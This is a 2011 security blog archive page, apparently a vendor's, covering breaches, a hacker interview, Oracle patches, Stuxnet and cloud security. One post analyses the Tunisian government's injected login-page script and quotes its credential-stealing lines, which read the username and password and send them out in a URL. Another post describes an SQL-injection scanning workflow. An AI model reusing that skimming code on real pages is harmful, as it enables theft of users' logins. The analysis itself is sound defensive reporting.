Blog|Login|中文Deutsche日本語
9 posts from January 2011
January 31, 2011
 Plenty of Fish? Plenty of Clear Text Passwords?
Pin It

In a story published more than a year ago about rockyou.com hack, the hacker said a large portion of websites are storing passwords in clear text.

In just the past few hours, a dating website plentyoffish.com seems to have suffered a major breach of up to 28M lost records.  The story above provides an interesting foreshadowing of things to come.  One of the comments made (again, a year ago!) in response to the rockyou.com breach was the fact that plentyoffish.com also stored passwords in clear text:

Fish

 

January 28, 2011
 WikiLeaks Competitor Comes Out of Stealth Mode
Pin It

Today's Washington Post reports on a new file-sharing, whistleblower site called OpenLeaks.  The story was also highlighted on Drudge.

Interesting video on the homepage that is "must-see TV".  The point of the video is to demonstrate how OpenLeaks will try to differentiate themselves from Wikileaks with better, faster technology for sharing sensitive files.  Few technical details on how it will work are provided, but they explain that OpenLeaks will provide automation to make it easier for whistle blowers to share documents.  They cite that Wikileaks is too manual and therefore slows the process of file sharing.  OpenLeaks, on the other hand, will have a "digital drop box" for journalists, NGOs, human rights' groups, etc... to share whatever documents they want whenever they want.  The service will go into beta sometime in the next few months.

I guess this would be called WaaS (Whistle blowing-as-a-Service).  The real question us IT geeks are really asking is this:  when will Gartner do a Magic Quadrant?

 

January 27, 2011
 Interview with a Hacker
Pin It

Our blog on hacked .edu and .mil websites raised a lot of attention.  Tony Bradley of PC World had an excellent, Kafkaesque take:

Have you ever walked into a kitchen at night and turned on the lights just in time to see a few cockroaches scurry off—knowing that the couple that got caught in the light are an indication that there are probably hundreds of them safely hidden in the walls and cabinets somewhere?

He continues:

Just like the cockroaches, for every site exposed on the hacker underground, there are most likely many more compromised sites that remain hidden. And, like the cockroaches, it is much more important to consider the big picture of how to improve security to protect Web sites and databases and guard against the larger problem than it is to focus on the handful that got caught in the light.

Now, the hacker responsible seems to have granted an interview—and you can read the full text here.

What does the hacker have to say?  He confirms Mr. Bradley’s “Cockroach Theory.”  Here's the highlight (sic):

QUESTION: Do you have any ethical problems with exploiting and then profiting from poor security on these sites?

ANSWER:  No at all. Each vulnerable site i face. I directly email the Web admin. If I see no reply I publish it.

QUESTION: Do you think the web site/application security is getting any better over the last 5 years? 3 years?

ANSWER:  Am into security since 1996. Simply I SEE NO CHANGES and it's become worst than ever.

 

January 25, 2011
 Hacking Facebook, Gmail and Yahoo! in Tunisia
Pin It

It’s only January and we’ve just witnessed a first:  cyber insecurity bringing down a government.  The government of Tunisia, a Wikileak’s target, has been under severe scrutiny for corruption ever since Wikileaks exposed some dodgy practices.

The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” where usernames and passwords were harvested, presumably, by the government to monitor and/or manipulate citizen communications.  Facebook, Gmail and Yahoo! were affected.

Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by Tunisian government:

Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf

Sorry, but this entry is about to get quite geeky.   But for those of you who enjoy the anatomy of a hack, this is quite interesting.  If you’re not a geek, basically these are pictures of a hacker’s hand in the cookie jar.

Hand-cookie-jar

The method is the same in all pages – adding the credential stealing hAAAQ3d() javascript function to the usual form post.

Compare the original Gmail form submission:

NormalGoogle

With the injected one (note the highlight):
InjectedGoogle
Here's the actual hAAAQ3d script:

  Harvestscript

 
The hAAAQ3d script grabs the username and password:

  • The username is stored in the us3r (= user) variable.  var us3r = frm.Email.value;
  • The password is stored in the pa55 (= pass) variable.  var pa55 = frm.Passwd.value;

The attack script then sends the credentials (after being scrambled with h6h function) to the nonexistent URL " http://www.google.com/wo0dh3ad" (= woodhead) as parameters:  

var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

Since the Tunisian government controls all internet transactions they could log all transactions to this link, it can easily obtain the credentials.  

 

 

 

January 21, 2011
 Major websites (gov,mil,edu) are Hacked and Up for Sale
Pin It

The list includes (with original hacker's typos):

Sites
The "traffic" probably stands for the number of records within the DB tables.  The "goods" in this case are probably the needed information for the "Level of Control."  For "full site admin" – probably the credentials and the URL of site administrator interface.

The hacker is also selling info personally identifiable information (PII) from hacked sites, for $20 per 1K records:

Pricing

 For example, here they want to sell a list of UConn staff:

  Uconnstaff

In the screenshot below, the hacker tries to show proof of accessing the administrator interface for a major university:

  UCSBadmin
 

The victims' vulnerabilities were probably obtained by SQL injection vulnerability automatic scanner and exploited in automatic manner, as the hacker published his methods in a post in some hacker forum – see screen shot and explanation:

  Proof

In the screen shot above we can see IRC "chat" between the SQLi "master" = @evil which issues the scanning commands and the exploiting "x0wner" which performs the commands.  In this specific case @evil issues command for to x0wner to obtain DB tables names ("!tbls") from vulnerable link ("www.site.gr/athlete.php?id=...") x0wner reports its findings  - the tables "activities","admin",… 

 

 

January 19, 2011
 Perspective on the latest Oracle patches
Pin It

Oracle patching needs fixing. In the past, Oracle provided a solid process of receiving reports, validating and scheduling fixes. Oracle had a lot of momentum around fixing database vulnerabilities. However, the quarterly patch cycle has seen a slow down in fixing database vulnerabilities since the acquisition and incorporation of so many companies and products during the past year. It's hard to believe there is only one database fix quarter-to-quarter when there must be dozens or even hundreds of vulnerabilities.

In the past, when Oracle had far fewer products, they would patch 100 database vulnerabilities at a time. One would assume that more products require more fixes, yet we are seeing smaller patches with fewer fixes for more products.

Additionally troubling is that Oracle gives no clear indication of what the vulnerabilities involve, citing concerns that hackers would transform these vulnerabilities into exploits. Unfortunately, hackers will already reverse engineer this patch to determine these vulnerabilities, leaving Oracle customers as the only party without insight into what is happening.

Without such insight, Oracle customers cannot develop a work-around for their production application and I find it hard to believe a company would patch critical applications without months of testing. This lack of transparency is outrageous behavior. Vendors expect researchers to shares details with them responsibly, yet they fail to do the same with security vendors and their customers.

Regarding the patch released on January 18th, there are four vulnerabilities rated 10 for severity. We are seeing fixes for remote execution without authentication, which is very severe. For example, the Audit Vault vulnerability allows an attacker to bypass authentication and act as a remote administrator to execute any command on a server installed with Audit Vault agent.

Within the database products, only six vulnerabilities are fixed. Two are remotely exploitable without authentication, yet the highest severity is only 7.5. It is also interesting to note only two vulnerabilities were fixed in the EBS suite. People soft and JDEdwards have 12 fixes. The primary exploit across the patch seems to be SQL injection in various modules.

Exploits may emerge over the next few days, but we’ll have to wait and see. Unfortunately, it will likely take much longer for companies to test and implement this patch into their production environment.

--Posted by Amichai Shulman, Imperva CTO

 

 

January 15, 2011
 Must read Stuxnet article
Pin It

http://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

Most interesting part:

The worm itself now appears to have included two major components. One was designed to send Iran’s nuclear centrifuges spinning wildly out of control. Another seems right out of the movies: The computer program also secretly recorded what normal operations at the nuclear plant looked like, then played those readings back to plant operators, like a pre-recorded security tape in a bank heist, so that it would appear that everything was operating normally while the centrifuges were actually tearing themselves apart.

The attacks were not fully successful: Some parts of Iran’s operations ground to a halt, while others survived, according to the reports of international nuclear inspectors. Nor is it clear the attacks are over: Some experts who have examined the code believe it contains the seeds for yet more versions and assaults.

 

 

January 13, 2011
 SAP Buys SECUDE
Pin It

Security continues its fast march towards becoming a business process.  SAP is the mother of business process software companies.

 "SAP is acquiring software and related assets from its partner SECUDE in order to provide improved security for its customer base, the company said Wednesday. The deal is expected to be completed by Feb. 1. Terms were not disclosed."

Who's next?

Who

 

January 04, 2011
 Cloud Security
Pin It

Before we talk about cloud security, its important to define the different cloud offerings enterprises hope to protect. Cloud models are:

  • Infrastructure as a Service (IaaS) – IaaS providers offer state-of-the-art flexible and secure cloud data centers. By pooling together large number of tenants, and leveraging virtualization and large scale management capabilities, IaaS providers deliver a sophisticated and elastic data center platform. Different IaaS providers offer Web attack protection and regulatory compliance readiness to their customers and generate incremental business.
  • Platform as a Service (PaaS) - PaaS providers offer application development and delivery platforms that accelerate time-to-market of new application and services. PaaS providers should provide their customers with Web attack protection as part of the underlying application architecture.
  • Software as a Service (SaaS) - SaaS providers deliver cloud-based business  applications for sales, financial, HR and other functional areas. These applications host large amounts of sensitive data across many organizations. As organizations adopt cloud applications to streamline their IT operations, SaaS providers are expected to ensure data security and address regulatory compliance – as would be the case for on-premise data.

Security Concerns With Cloud Computing
Migration to the cloud is on every organization’s objectives list. Yet, a Forrester 2009 Q4 survey encompassing 165 companies over 39 countries has shown otherwise. When asked “what are your top SaaS adoption inhibitors”, the most frequent cited concern was security, 48 percent.  This should surprise anyone since, after all, cloud services have fallen victim to security vulnerabilities. Just looking at the “big” players we can quickly count some of the mishaps: Gmail email and contact lists, as well as Yahoo mail, were prone to XSS and Javascript hijacking. Amazon EC2 was vulnerable to an Amazon Web Services signature vulnerability. Twitter has fallen prey to an attack when a hacker obtained and distributed more than 300 confidential documents pertaining to Twitter’s business affairs that were stored on Google Apps. 

Threat in the Cloud
We outlined, in detail, concerns with cloud computing in previous blog post.  Many of the security threats that affect non cloud deployments are the same.  Hackers and insiders want data and we live in a data driven world.  But there are differences:

  • Maintaining bulletproof partitions between datasets of different customers.
  • Providing different levels of data security to applications sharing the same logical or physical platforms.
  • Protecting customer data from the prying eyes of cloud administrators.
  • Providing solutions that operate over a specialized infrastructure (VM, Amazon AMI).
  • Managing application and data security for a large number of applications inside the cloud. 

What should enterprises ask themselves when choosing a cloud provider?  More on that later.

 

 

 

 

Find Us Online
RSS Feed - Subscribe Twitter Facebook iTunes LinkedIn YouTube
Authors
Monthly Archives
Email Subscription
Sign up here to receive our blog: